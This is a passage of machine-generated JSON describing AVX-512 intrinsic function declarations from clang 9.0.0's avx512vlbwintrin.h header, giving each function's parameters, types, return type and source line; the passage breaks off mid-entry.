"tag": "function", "name": "_mm256_maskz_subs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1203:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_subs_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1211:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_subs_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1219:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_subs_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1227:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_subs_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1235:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_subs_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1243:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_subs_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1251:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_subs_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1259:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_subs_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1267:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_permutex2var_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1275:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_permutex2var_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1282:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask2_permutex2var_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1291:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_permutex2var_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1300:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_permutex2var_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1309:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_permutex2var_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1316:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask2_permutex2var_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1325:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_permutex2var_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1334:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_maddubs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1343:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_maddubs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1350:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_maddubs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1357:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_maddubs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1365:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_madd_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1372:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_madd_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1379:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_madd_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1386:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_madd_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1393:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_cvtsepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1400:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtsepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1407:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtsepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1414:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_cvtsepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1421:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtsepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1428:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_cvtsepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1435:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cvtusepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1442:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtusepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1449:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtusepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1456:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_cvtusepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1463:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtusepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1470:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_cvtusepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1477:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cvtepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1484:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1492:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1499:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtepi16_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1506:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mask_cvtsepi16_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1513:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mask_cvtusepi16_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1519:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_cvtepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1525:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1530:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_cvtepi16_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1537:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtepi16_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1544:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_mask_cvtsepi16_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1550:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_mask_cvtusepi16_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1556:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mask_mulhrs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1562:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_mulhrs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1569:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_mulhrs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1576:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_mulhrs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1583:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_mulhi_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1590:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_mulhi_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1597:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_mulhi_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1604:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_mulhi_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1611:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_mulhi_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1618:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_mulhi_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1625:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_mulhi_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1632:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_mulhi_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1639:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_unpackhi_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1646:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_unpackhi_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1653:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_unpackhi_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1660:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_unpackhi_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1667:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": 